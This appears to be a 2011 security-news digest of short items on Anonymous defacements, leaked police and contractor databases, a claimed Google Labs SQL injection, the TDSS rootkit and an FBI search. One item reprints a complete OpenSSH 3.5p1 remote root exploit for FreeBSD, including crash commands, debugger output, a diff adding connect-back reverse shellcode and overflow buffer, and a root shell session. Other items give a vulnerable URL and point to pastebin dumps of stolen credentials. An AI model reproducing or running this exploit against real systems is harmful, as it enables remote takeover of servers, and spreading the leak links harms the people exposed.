The Hackers News

Official Website of Amy Winehouse - Songer/Songwriter Defaced by #Antisec
Meggit - US Military and Law Enforcement equipment supplier hacked for #Antisec
Mesa Arizona Fraternal Order of Police website hacked, Data exposed !
SQL Injection Vulnerability in Google Lab Database System
MasterCard downed by ISP, not Anonymous hackers
Indonesian and Australian police launched Cyber Crime Investigation Center
OpenSSH 3.5p1 Remote Root Exploit for FreeBSD
Mobius Forensic Toolkit v0.5.8 Released
TDSS rootkit infects 1.5 million US computers
FBI searches LulzSec suspect home in Hamilton, Ohio

Official Website of Amy Winehouse - Songer/Songwriter Defaced by #Antisec

Posted: 01 Jul 2011 12:33 AM PDT

Official Website of Amy Winehouse - Songer/Songwriter Defaced by #Antisec

Amy Jade Winehouse official website http://www.amywinehouse.com/ defaced by Anonymous hackers for Antisec .

Amy Jade Winehouse (born 14 September 1983) is an English singer-songwriter, known for her powerful contralto vocals and her eclectic mix of various musical genres including R&B, soul, and jazz. She has received publicity over her substance abuse and mental health issues.

Related hack => Meggit - US Military and Law Enforcement equipment supplier hacked for #Antisec - Read here

Meggit - US Military and Law Enforcement equipment supplier hacked for #Antisec

Posted: 01 Jul 2011 12:20 AM PDT

Meggit Database Hacked - US Military and Law Enforcement equipment supplier for #Antisec

Database of www.meggitttrainingsystems.com a US Military and Law Enforcement equipment supplier has been hacked and exposed by Anonymous ( The Bash Crew ) .

Hackers said "People of the USA your government puts there trust and your money into these people and we got into there database useing a google dork and a simple sql injection.Any ways we hope this will cause many lulz atleast in spamming heads of the corp's and government that choose such a poorly secured site. "

vUNL link : http://www.meggitttrainingsystems.com/main.php?id=119

Hackers Release database on Pastebin : http://pastebin.com/0r4A9DVR

Mesa Arizona Fraternal Order of Police website hacked, Data exposed !

Posted: 30 Jun 2011 09:23 PM PDT

Mesa Arizona Fraternal Order of Police website hacked, Data exposed !

Anonymous Hackers deface Mesa Arizona Fraternal Order of Police website - http://mesafop.com/ . This hack is done for Operation Antisec.

The Post a message and All data of Arizona Police on the deface page. Alternate you can see written part on : http://pastebin.com/RakyZgJE .

Hackers claim to deface following domains :
azfop.com, azfop78.com, azfop5.com, tucsonfop.com, mesafop.com,azfop32.com, azfop50.com, azfop44.com, azfop62.com, azfop58.com

Hackers expose Credit Card details and Email/Passwords of lots of officers

Not only this, They also expose the usernames and passwords for 1200 FOP members in deface page.

SQL Injection Vulnerability in Google Lab Database System

Posted: 01 Jul 2011 12:41 AM PDT

SQL Injection Vulnerability in Google Lab Database System

Very Big & Critical Vulnerability detected in Google Lab System. Vendor is already reported by hackers, But they don't take positive step in this case, so finally hackers exposed the vulnerability in public by Bangladesh Cyber Army Admin - Shadman Tanjim on their Forum.

Google Lab Website has SQL Injection Vulnerability and Dangerous thing is this Vulnerability is Exploitable. Hackers are able to get Tables, columns and data from Database. Google Lab Database has his own customize DB system. But Interesting things is their database system is Similar as Ms Access database. In this case Ms Access SQL Injection System is Also Work on Google Lab Database system.

Statement By Hacker :

I already contact with Google Corporation but they don't give positive response, I think this is their big fault, and will suffer for that. But if they give Positive response then this will be very good for them. Thanks a Ton!!!

Shadman Tanjim

Ethical Hacker, Programmer and Security Professional

Email: admin@bdcyberarmy.com or shadman2600@gmail.com

Website: www.bdcyberarmy.com/forum

Greets to: Shahee Mirza, Almas Zaman, Sayem Islam, Pudina pata, LuckyFm and All

Bangladesh Cyber Army Members.

Video Download link:
http://www.bdcyberarmy.com/Google/google_video.avi

Hackers Release Step by step proof about this Vulnerability
1. Website : www.googlelabs.com or labs.google.com

2. Vulnerability type : SQL Injection
3. Vulnerable url : http://www.googlelabs.com/?q=%27&apps=Search+Labs
4. Info:
Host IP: 209.85.175.141
Web Server: Google Frontend
Keyword Found: Fast
Injection type is Integer

Let's Check Exploiting this Vulnerable link. Here Hackers use 3 Famous SQL Injection tools. They are:
1. Havij Advance SQL Injection Tool
2. Safe3 SQL Injector v8.4
3. Pangolin SQL Injection Tool

1st Work with Havij Advance SQL Injection Tool:
Screen Shot 1: Scan Vulnerable link and it says this website is Vulnerable.

Screen Shot 2: Now it scans and gets all tables and columns

Screen Shot 3: Now you can see list of tables and Columns

And this is a Prove for this Website is Genuine SQL Injection Vulnerable. Here you see this database type is MS Access, so this is a Proof of this concept. Some people should Say Google Lab Database System is not Ms Access but this Website Database is Similar as Ms Access database and Ms Access SQL Injection Query are also Work on Google Labs Database system. As like MySQL 5 and MySQL 4.1 both are injected via Union select, but both are not have Information Schema.

2nd now Work with Safe3 SQL Injector v8.4:
Screen Shot 1: Analyzing Vulnerable link and it says it's vulnerable and gets keyword and db type.

Screen Shot 2: Now it's Inject the vulnerable link and gets All Table list and column list

This is another Prove for this Website Vulnerability and we can see this and Dangerous thing is its Exploitable. Now we check our last SQL Injection tool for 100% Satisfy.

3rd Pangolin SQL Injection Tool:
Screen Shot 1: Scan vulnerable link and its say this website is vulnerable

Screen Shot 2: Now inject this Website and get tables and columns list

Screen Shot 3: Here is a full List of Tables and Columns list

Now I think we are 100% Sure Google Lab Website is SQL Injection Vulnerable.

You Can Check Video. This Video is also made by Bangladesh Cyber Army Member - Shadman Tanjim.

UPDATE :
Google insist that there has been no intrusion. The company claims that their GQL database won't allow SQL injection attacks. Additionally, they say that the data that appears in the screen shots, does not exist anywhere in their data stores.

On this Shadman Tanjim - Hackers Reply to Google "Proof it. because I am Also Proof it's Vulnerable. If they say's Google Lab is Not Vulnerable, It Means We get new Bugs in Some Famous SQL Injection tools. And also and 1=1 concept. So tell them to proof this and I don't think All tools are false. because 1 tools can false, 2 tools can get false but not All. ALL Tools say's it is Vulnerable, So i don't think it any confusion. :D "

MasterCard downed by ISP, not Anonymous hackers

Posted: 30 Jun 2011 09:20 AM PDT

MasterCard downed by ISP, not Anonymous hackers

Two days before Anonymous declare that MasterCard again down by Ddos attack in support of Wikileaks & Anonymous via twitter. It was shortly after MasterCard went down that someone on Twitter, known as ibomhacktivist, promoted "MasterCard.com DOWN!!!", adding the site was down for messing with WikiLeaks and Anonymous.

But in actual, MasterCard.com was offline, and shortly after the outage was noticed by the public, someone on Twitter claimed credit. In a statement, MasterCard blamed the outage on an ISP issue, without discounting that they were attacked upstream.

"MasterCard's corporate, public-facing Website experienced intermittent service disruption, due to a telecommunications/Internet Service Provider outage that impacted multiple users. It is important to note that no cardholder data has been impacted and that cardholders can continue to use their cards securely. We are continuing to monitor the situation closely.," spokeswoman Jennifer Stalzer said in an email to the media.

Indonesian and Australian police launched Cyber Crime Investigation Center

Posted: 30 Jun 2011 09:00 AM PDT

Indonesian and Australian police launched Cyber Crime Investigation Center

Indonesian and Australian police officially launched a joint project called the Cyber Crime Investigation Center. The center was officiated by Indonesian National Police chief Gen. Timur Pradopo and Australian Federal Police chief Comr. Tony Negus at the National Police Headquarters in Jakarta on Thursday.
Timur said the center had been planned since six months ago.

"Today, we launch the center, which will be equipped with tools needed to carry out cyber crime investigation," Timur said, adding that its communication technology equipment was being provided by the Australian government."Of course, this [center] will improve our capacity to detect and [investigate cyber] crimes, particularly transnational crimes," he said.

Negus said the center would allow the Indonesian National Police to deal with technology and IT-related crimes. He added that the Australian police force was looking to forge cooperative agreements in its investigation of transnational crimes, not only in region but also across the world.

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

Posted: 30 Jun 2011 08:10 AM PDT

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD has been shared by kcope on twitter. The Released note is as given below :

OpenSSH 3.5p1 Remote Root Exploit for FreeBSD
Discovered and Exploited By Kingcope
Year 2011
--

The last two days I have been investigating a vulnerability in OpenSSH
affecting at least FreeBSD 4.9 and 4.11. These FreeBSD versions run
OpenSSH 3.5p1 in the default install.

The sshd banner for 4.11-RELEASE is "SSH-1.99-OpenSSH_3.5p1 FreeBSD-20060930".

A working Remote Exploit which spawns a root shell remotely and 
previous to authentication was developed.

The bug can be triggered both through ssh version 1 and ssh version 2
using a modified ssh client. During the investigation of the vulnerability it was found that
the bug resides in the source code file "auth2-pam-freebsd.c".

http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/Attic/auth2-pam-freebsd.c

This file does not exist in FreeBSD releases greater than 5.2.1. The last commit
is from 7 years ago.

Specifically the bug follows a code path in the PAM Authentication Thread inside this
source code, "pam_thread()". It could not be verified if the bug is inside this
(third party, freebsd) OpenSSH code or in the FreeBSD pam library itself.

Both the challenge response (ssh version 1) and keyboard interactive via pam
(ssh version 2) authentications go through this code path.

By supplying a long username to the daemon the sshd crashes.

h4x# sysctl kern.sugid_coredump=1
kern.sugid_coredump: 0 -> 1

root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138

h4x# tail -1 /var/log/messages
Jun 30 16:01:25 h4x /kernel: pid 160 (sshd), uid 0: exited on signal 11 (core dumped)

Looking into the coredump reveals:

h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x28092305 in ?? ()
(gdb) x/1i $eip
0x28092305:     (bad)

The sshd crahes at a place with illegal instructions. It looks like it depends
on how the sshd is started. Starting the sshd from the console as root and running
the ssh client with long username again reveals:

h4x# killall -9 sshd
h4x# /usr/sbin/sshd

root@debian:~# ssh -l`perl -e 'print "A" x 100'` 192.168.32.138

h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) x/10i $eip
0x41414141:     Cannot access memory at address 0x41414141.

As you can see in the above gdb output we can control EIP completely.
If someone finds out on what this behaviour depends, especially why EIP can
be controlled when starting sshd in the console and can not be easily controlled
when being run from the boot sequence, please drop me an email at
isowarez.isowarez.isowarez@googlemail.com.

Anyhow this procedure shows that the sshd can be exploited because the instruction
pointer can be fully controlled.

The developed exploit (Proof of Concept only) is a patched OpenSSH 5.8p2 client.
Using a reverse shellcode it will spawn a rootshell.

Only one offset is needed, the position of the shellcode can be found the following way:

h4x# gdb -c /sshd.core
GNU gdb 4.18 (FreeBSD)
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd".
Core was generated by `sshd'.
Program terminated with signal 11, Segmentation fault.
#0  0x41414141 in ?? ()
(gdb) set $x=0x08071000
(gdb) while(*++$x!=0x90909090)
 >end
(gdb) x/10b $x

The printed address is the beginning of the shellcode nopsled.

Attached is the Proof of Concept as a diff to OpenSSH-5.8p2.

It roughly does the following:

root@debian:~# ./ssh -1 192.168.32.138

root@debian:~# nc -v -l -p 10000
listening on [any] 10000 ...
192.168.32.138: inverse host lookup failed: Unknown host
connect to [192.168.32.128] from (UNKNOWN) [192.168.32.138] 1038
uname -a;id;
FreeBSD h4x.localdomain 4.11-RELEASE FreeBSD 4.11-RELEASE #0: Fri Jan 21 17:21:22 GMT 2005     root@perseus.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC  i386
uid=0(root) gid=0(wheel) groups=0(wheel)

--

root@debian:~# diff openssh-5.8p2/sshconnect1.c openssh-5.8p2_2/sshconnect1.c
667a668,717
> // Connect Back Shellcode
>
> #define       IPADDR  "\xc0\xa8\x20\x80"
> #define PORT  "\x27\x10"              /* htons(10000) */
>
> char sc[] =
>    "\x90\x90"
>    "\x90\x90"
>    "\x31\xc9"                 // xor    ecx, ecx
>    "\xf7\xe1"                 // mul    ecx
>    "\x51"                     // push   ecx
>    "\x41"                     // inc    ecx
>    "\x51"                     // push   ecx
>    "\x41"                     // inc    ecx
>    "\x51"                     // push   ecx
>    "\x51"                     // push   ecx
>    "\xb0\x61"                 // mov    al, 97
>    "\xcd\x80"                 // int    80h
>    "\x89\xc3"                 // mov    ebx, eax
>    "\x68"IPADDR                       // push   dword 0101017fh
>    "\x66\x68"PORT             // push   word 4135
>    "\x66\x51"                 // push   cx
>    "\x89\xe6"                 // mov    esi, esp
>    "\xb2\x10"                 // mov    dl, 16
>    "\x52"                     // push   edx
>    "\x56"                     // push   esi
>    "\x50"                     // push   eax
>    "\x50"                     // push   eax
>    "\xb0\x62"                 // mov    al, 98
>    "\xcd\x80"                 // int    80h
>    "\x41"                     // inc    ecx
>    "\xb0\x5a"                 // mov    al, 90
>    "\x49"                     // dec    ecx
>    "\x51"                     // push   ecx
>    "\x53"                     // push   ebx
>    "\x53"                     // push   ebx
>    "\xcd\x80"                 // int    80h
>    "\x41"                     // inc    ecx
>    "\xe2\xf5"                 // loop   -10
>    "\x51"                     // push   ecx
>    "\x68\x2f\x2f\x73\x68"     // push   dword 68732f2fh
>    "\x68\x2f\x62\x69\x6e"     // push   dword 6e69622fh
>    "\x89\xe3"                 // mov    ebx, esp
>    "\x51"                     // push   ecx
>    "\x54"                     // push   esp
>    "\x53"                     // push   ebx
>    "\x53"                     // push   ebx
>    "\xb0\xc4\x34\xff"
>    "\xcd\x80";                // int    80h
>
679a730,737
>       char buffer[8096];
>
>       // Offset is for FreeBSD-4.11 RELEASE OpenSSH 3.5p1
>       memcpy(buffer, "AAAA\x58\xd8\x07\x08""CCCCDDDDEEEE\xd8\xd8\x07\x08""GGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO", 24);
>       memset(buffer+24, '\x90', 5000);
>       memcpy(buffer+24+5000, sc, sizeof(sc));
>       server_user=buffer;
>
690a749
>

Cheers,

Kingcope

Mobius Forensic Toolkit v0.5.8 Released

Posted: 30 Jun 2011 08:05 AM PDT

Mobius Forensic Toolkit v0.5.8 Released

Mobius Forensic Toolkit is a forensic framework written in Python/GTK that manages cases and case items, providing an abstract interface for developing extensions. Cases and item categories are defined using XML files for easy integration with other tool

Change Log :

The Hive (registry viewer) features three new reports:email accounts, TCP/IP interfaces, and computer descriptions.
All registry reports can be exported as CSV and the user password report can be exported in a format suitable for John the Ripper as well.
Minor improvements were made

Installation

As root, type:
python setup.py install

Usage

Run mobius_bin.py.

Download Here

TDSS rootkit infects 1.5 million US computers

Posted: 30 Jun 2011 07:56 AM PDT

TDSS rootkit infects 1.5 million US computers

Millions of PCs around the world infected by the dangerous TDSS 'super-malware' rootkit as part of a campaign to build a giant new botnet. The report is presented by researchers from security firm Kaspersky Lab.

TDSS also known as 'TDL' and sometimes by its infamous rootkit component, Alureon. It has grown into a multi-faceted malware nexus spinning out ever more complex and dangerous elements as it evolves.

Kaspersky Lab researchers were able to penetrate three SQL-based command and control (C&C) servers used to control the activities of the malware's latest version, TDL-4, where they discovered the IP addresses of 4.5 million IP PCs infected by the malware in 2011 alone. Almost 1.5 million of these were in the US.If active, this number of compromised computers could make it one of the largest botnets in the world, with the US portion alone worth an estimated $250,000 (£155,000) to the underground economy.

The researchers noticed a kad.dll component of the infection which appears to allow TDSS/TDL-4 an elaborate C&C channel to control bots using the Kad P2P file exchange network even if the primary encrypted channel has been shut down by rival botnetters or security companies.

"We don't doubt that the development of TDSS will continue," said Kaspersky researcher, Sergey Golovanov, who performed the latest analysis of TDSS. "Active reworkings of TDL-4 code, rootkits for 64-bit systems, the use of P2P technologies, proprietary anti-virus and much more make the TDSS malicious program one of the most technologically developed and most difficult to analyse."

FBI searches LulzSec suspect home in Hamilton, Ohio

Posted: 30 Jun 2011 07:39 AM PDT

FBI searches LulzSec suspect home in Hamilton, Ohio

The investigation into the LulzSec hacking team continues, with news that FBI agents have searched a house in Hamilton, Ohio. FBI investigation believed to have been fuelled by interviews with Ryan Cleary, but did not lead to charges.

Federal agents are said to have searched a teenager's home in Jackson Road, Hamilton on Monday 27 June, although no-one was charged after the search warrant was served.

Ohio teenager was known within LulzSec as "m_nerva", who leaked text logs of discussions between the group after they had hacked into the website of an FBI affiliate at the beginning of June.

After that, m_nerva's case address was listed by LulzSec as being in Hamilton, Ohio

Last week FBI agents searched the house of a woman in Iowa and questioned her about links with the group. LulzSec said in a statement that it had six members, though it never stated their gender.